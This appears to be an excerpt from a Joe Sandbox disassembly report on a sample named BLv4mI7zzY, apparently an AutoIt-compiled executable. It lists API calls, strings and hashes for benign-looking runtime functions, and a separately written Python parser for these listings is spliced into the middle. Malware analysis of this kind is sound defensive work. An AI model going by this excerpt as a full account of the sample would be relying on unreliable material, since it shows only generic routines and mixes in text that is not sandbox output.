                                                              • Opcode ID: c590f5ff23737a5459203e41aea92f1bd88a7162374850cd9de9ce6a106fee1a
                                                              • Instruction ID: 479b7c4ae9b000dd46d838348d72eaf7357b356d35a8f8533c4cc8a1a3f2d95c
                                                              • Opcode Fuzzy Hash: c590f5ff23737a5459203e41aea92f1bd88a7162374850cd9de9ce6a106fee1a
                                                              • Instruction Fuzzy Hash: 0A81B0710082059FDB01EF15C885BAF7BD8EF44358F04896BFE858A196DB38DD49CBA9
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • DragQueryPoint.SHELL32(?,?), ref: 004BC627
                                                                • Part of subcall function 004BAB37: ClientToScreen.USER32(?,?), ref: 004BAB60
                                                                • Part of subcall function 004BAB37: GetWindowRect.USER32(?,?), ref: 004BABD6
                                                                • Part of subcall function 004BAB37: PtInRect.USER32(?,?,004BC014), ref: 004BABE6
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004BC690
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004BC69B
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004BC6BE
                                                              • _wcscat.LIBCMT ref: 004BC6EE
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004BC705
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004BC71E
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 004BC735
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 004BC757
                                                              • DragFinish.SHELL32(?), ref: 004BC75E
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004BC851
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbO
                                                              • API String ID: 169749273-2135428632
                                                              • Opcode ID: bc4461f4fc9e48f33f3ad92979c0453bab4e0f687a04ad8c65b905e1e940e4fe
                                                              • Instruction ID: 75ad52eee72d67467a2ddb14166423d9963d83c8d367cf83c084f43e28bf6b41
                                                              • Opcode Fuzzy Hash: bc4461f4fc9e48f33f3ad92979c0453bab4e0f687a04ad8c65b905e1e940e4fe
                                                              • Instruction Fuzzy Hash: A4617E71108301AFC701EF65CC85EAFBBE8EF88314F400A2FF595921A1DB749909CB6A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: 8f45d2128f6a06d3eb9297e16753e489da88307d5bf4f1143f9e9dc64ed751a8
                                                              • Instruction ID: f17064d7e02f5123ab1ecb655e95b1f53bf92a18fc00a1f051b45dea51263369
                                                              • Opcode Fuzzy Hash: 8f45d2128f6a06d3eb9297e16753e489da88307d5bf4f1143f9e9dc64ed751a8
                                                              • Instruction Fuzzy Hash: 8B31E670948209A6EA10FA52DE03FAE77A4AF1472AF30082FF441710D2EF9D6F14C65E
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 004A5013
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004A501E
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 004A5029
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 004A5034
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 004A503F
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 004A504A
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 004A5055
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 004A5060
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 004A506B
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 004A5076
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 004A5081
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 004A508C
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 004A5097
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 004A50A2
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004A50AD
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 004A50B8
                                                              • GetCursorInfo.USER32(?), ref: 004A50C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: 2d82b1997b0c2db934e186bf00edad8b971beac6602514bb574a5577a27afed6
                                                              • Instruction ID: 8ea8995f252440c5e35d25459b5201f1fadf388d95211cb73d74f5f6de2a797b
                                                              • Opcode Fuzzy Hash: 2d82b1997b0c2db934e186bf00edad8b971beac6602514bb574a5577a27afed6
                                                              • Instruction Fuzzy Hash: 243112B1D083196ADF109FB68C8996FBFE8FF14750F50453BA50CE7281DA78A5048F95
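The per-function "APIs" listings above are the most reusable part of these records: the "API ID" line is only a sorted bag of tokens, while the ref addresses give the actual call order, and "Part of subcall function" entries are calls made one level down. The parser below, an added example that is not part of the Joe Sandbox report or of Joe Sandbox's tooling, turns a listing into structured records so call sequences and immediate arguments (for instance the IDC_* resource IDs passed to LoadCursorW in the block just above) can be compared across samples. The line layout it matches (api.MODULE(args), ref: ADDR, with optional "Part of subcall function ADDR:" prefix) is inferred from this page, not from a published specification; the sample input is a constructed mix of line shapes copied from the page and does not belong to a single function.

```python
"""Parse a Joe Sandbox per-function 'APIs' listing into structured records.

Added example; not the report's or Joe Sandbox's own code. The record
layout is inferred from the listing on this page, not from a published spec.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: bullet lines in the shapes the report uses, including a
# nested 'Part of subcall function' entry and two calls printed without an
# argument list (LIBCMT helpers and zero-argument USER32 calls).
SAMPLE = """\
• LoadCursorW.USER32(00000000,00007F8A), ref: 004A5013
• LoadCursorW.USER32(00000000,00007F00), ref: 004A501E
  • Part of subcall function 00432344: GetCursorPos.USER32(?), ref: 00432357
• GetCursorInfo.USER32(?), ref: 004A50C8
• _wcscmp.LIBCMT ref: 0048A52E
• GetDesktopWindow.USER32 ref: 004BA40D
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str                 # exported name, e.g. LoadCursorW
    module: str              # module token after the dot, e.g. USER32
    args: List[str]          # raw argument tokens; '?' means unresolved
    ref: int                 # address of the call site
    subcall_of: Optional[int] = None  # callee address when the entry is nested


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse every bullet line; raise on a line the layout does not cover."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = LINE_RE.match(raw)
        if not m:
            raise ValueError(f"unrecognised line: {raw!r}")
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def call_sequence(calls: List[ApiCall], include_subcalls: bool = False) -> List[str]:
    """API names in call-site address order.  Nested entries are excluded by
    default because their ref addresses belong to the callee, not this function."""
    chosen = [c for c in calls if include_subcalls or c.subcall_of is None]
    return [c.api for c in sorted(chosen, key=lambda c: c.ref)]


def imm_args(calls: List[ApiCall], api: str) -> List[List[Optional[int]]]:
    """Immediate arguments of every call to `api`, decoded from hex; tokens
    that are not hex (e.g. '?' or a string literal) become None."""
    out: List[List[Optional[int]]] = []
    for c in calls:
        if c.api == api:
            out.append([int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None
                        for a in c.args])
    return out


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    print(call_sequence(parsed, include_subcalls=True))
    print(imm_args(parsed, "LoadCursorW"))
```

Sorting by ref only makes sense within one function record; when feeding several records in, keep them separate or carry a per-record key alongside the address.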
                                                              APIs
                                                              • _memset.LIBCMT ref: 004BA259
                                                              • DestroyWindow.USER32(?,?), ref: 004BA2D3
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004BA34D
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004BA36F
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004BA382
                                                              • DestroyWindow.USER32(00000000), ref: 004BA3A4
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00430000,00000000), ref: 004BA3DB
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004BA3F4
                                                              • GetDesktopWindow.USER32 ref: 004BA40D
                                                              • GetWindowRect.USER32(00000000), ref: 004BA414
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004BA42C
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004BA444
                                                                • Part of subcall function 004325DB: GetWindowLongW.USER32(?,000000EB), ref: 004325EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 1297703922-3619404913
                                                              • Opcode ID: ea35ab72e6555ddd0b43c576d3da3e1d36d8c093fb0f0acb845192cac5a86570
                                                              • Instruction ID: 2536100a1a3c640947b8f019ab7b3f885c2d4982e736a70032ad0b8d992ef3fa
                                                              • Opcode Fuzzy Hash: ea35ab72e6555ddd0b43c576d3da3e1d36d8c093fb0f0acb845192cac5a86570
                                                              • Instruction Fuzzy Hash: 88719E70140205AFD721DF18CC49FA77BE5FB88304F04452EF985872A0DBB8E926CB6A
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 004B4424
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004B446F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 64f0386dfac72ab97d9a8020b9cc515bbcac2b9ccdb10bbe47d13cc124235f33
                                                              • Instruction ID: 6bce17250ec8167e3d9bddfbfe18bfc5a6dd2d8690d2a1905a18f8f222205f9d
                                                              • Opcode Fuzzy Hash: 64f0386dfac72ab97d9a8020b9cc515bbcac2b9ccdb10bbe47d13cc124235f33
                                                              • Instruction Fuzzy Hash: 529192742007019FCB14EF15C451A6EB7E1AF95358F04886EF8965B3A3CB78ED0ACB59
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004BB8B4
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004B91C2), ref: 004BB910
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004BB949
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004BB98C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004BB9C3
                                                              • FreeLibrary.KERNEL32(?), ref: 004BB9CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004BB9DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,004B91C2), ref: 004BB9EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004BBA0B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004BBA17
                                                                • Part of subcall function 00452EFD: __wcsicmp_l.LIBCMT ref: 00452F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 5a0d89538a11230e3efa3c52dd2215e2f0b6e82df200b9e456a8eac01380de2f
                                                              • Instruction ID: 6b580ecac9b7349c9cb7e81bd87f801347b13b52f723dee0168cdfa98251b704
                                                              • Opcode Fuzzy Hash: 5a0d89538a11230e3efa3c52dd2215e2f0b6e82df200b9e456a8eac01380de2f
                                                              • Instruction Fuzzy Hash: 3361CEB1900205BAEB14DF65CC41BFE77A8FB08711F10461BF915D61C1DBB8A984DBA8
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 0049DCDC
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0049DCEC
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0049DCF8
                                                              • __wsplitpath.LIBCMT ref: 0049DD56
                                                              • _wcscat.LIBCMT ref: 0049DD6E
                                                              • _wcscat.LIBCMT ref: 0049DD80
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0049DD95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DDA9
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DDDB
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DDFC
                                                              • _wcscpy.LIBCMT ref: 0049DE08
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0049DE47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: de097244591e4d98f73f76270a53f12414223f00b53c8d2cad539a006dfae625
                                                              • Instruction ID: f0763abd8df5748c415b3a4ff348d3ec72e6b1739459b8ddb78ac8a82087aade
                                                              • Opcode Fuzzy Hash: de097244591e4d98f73f76270a53f12414223f00b53c8d2cad539a006dfae625
                                                              • Instruction Fuzzy Hash: CE616C725042059FCB10EF61C8849AFB7E8FF89314F04492EF989C7251DB79E949CB9A
                                                              APIs
                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00499C7F
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00499CA0
                                                              • __swprintf.LIBCMT ref: 00499CF9
                                                              • __swprintf.LIBCMT ref: 00499D12
                                                              • _wprintf.LIBCMT ref: 00499DB9
                                                              • _wprintf.LIBCMT ref: 00499DD7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 311963372-3080491070
                                                              • Opcode ID: 593eff45f46a73993ef8d003e968f6807d1b0139a5ce7a360432da52b941a28a
                                                              • Instruction ID: 38cab5eab740123b1d881cedff25dcd0ea52b9e1a311b45fe4439489bad17547
                                                              • Opcode Fuzzy Hash: 593eff45f46a73993ef8d003e968f6807d1b0139a5ce7a360432da52b941a28a
                                                              • Instruction Fuzzy Hash: A651A471900509AACF15EBE5CD46EEEBB78AF08305F20016FF505721A2EB392F59CB59
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • CharLowerBuffW.USER32(?,?), ref: 0049A3CB
                                                              • GetDriveTypeW.KERNEL32 ref: 0049A418
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0049A460
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0049A497
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0049A4C5
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 2698844021-4113822522
                                                              • Opcode ID: 556f92ee365df9055bb0f57eededa0b82d64897cf20c5afd51811aeb6f5b0e31
                                                              • Instruction ID: 2b8b275afd4dbf873d5921b2b5e04b2bd7ea0d7fd9a35abb55173920f5fd41dd
                                                              • Opcode Fuzzy Hash: 556f92ee365df9055bb0f57eededa0b82d64897cf20c5afd51811aeb6f5b0e31
                                                              • Instruction Fuzzy Hash: 3E518FB11143059FCB10EF12C88196BB7F4EF98718F10886EF89957251DB79ED09CB8A
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0046E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0048F8DF
                                                              • LoadStringW.USER32(00000000,?,0046E029,00000001), ref: 0048F8E8
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0046E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0048F90A
                                                              • LoadStringW.USER32(00000000,?,0046E029,00000001), ref: 0048F90D
                                                              • __swprintf.LIBCMT ref: 0048F95D
                                                              • __swprintf.LIBCMT ref: 0048F96E
                                                              • _wprintf.LIBCMT ref: 0048FA17
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0048FA2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 984253442-2268648507
                                                              • Opcode ID: 426184fd088f8de2ef193321b3b9959b43226ac7dc23c5779cf17c3c2e07d56b
                                                              • Instruction ID: 97ebd9df96d3ab0846bf371318d388fdc60a708638fb2906c119b8f4c71b2723
                                                              • Opcode Fuzzy Hash: 426184fd088f8de2ef193321b3b9959b43226ac7dc23c5779cf17c3c2e07d56b
                                                              • Instruction Fuzzy Hash: 614164B2800109AACF15FFE1DD46EEEB778AF18315F10146AF50572092EB396F09CB69
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004B9207,?,?), ref: 004BBA56
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBA6D
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBA78
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBA85
                                                              • GlobalLock.KERNEL32(00000000), ref: 004BBA8E
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBA9D
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004BBAA6
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBAAD
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBABE
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004C2CAC,?), ref: 004BBAD7
                                                              • GlobalFree.KERNEL32(00000000), ref: 004BBAE7
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 004BBB0B
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 004BBB36
                                                              • DeleteObject.GDI32(00000000), ref: 004BBB5E
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004BBB74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: c04e8c051f16174370c94e140919dcd64c42ec636424765b2285e6dd31d3edcf
                                                              • Instruction ID: 9f0fdafda148e7cce57fdd39a08c18a46a67a4f6558fd4795515287a9bdc703b
                                                              • Opcode Fuzzy Hash: c04e8c051f16174370c94e140919dcd64c42ec636424765b2285e6dd31d3edcf
                                                              • Instruction Fuzzy Hash: 60415775600208FFDB119F69DC88EABBBB8FB89711F104169F90AD7260C774AE05CB64
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 0049DA10
                                                              • _wcscat.LIBCMT ref: 0049DA28
                                                              • _wcscat.LIBCMT ref: 0049DA3A
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0049DA4F
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DA63
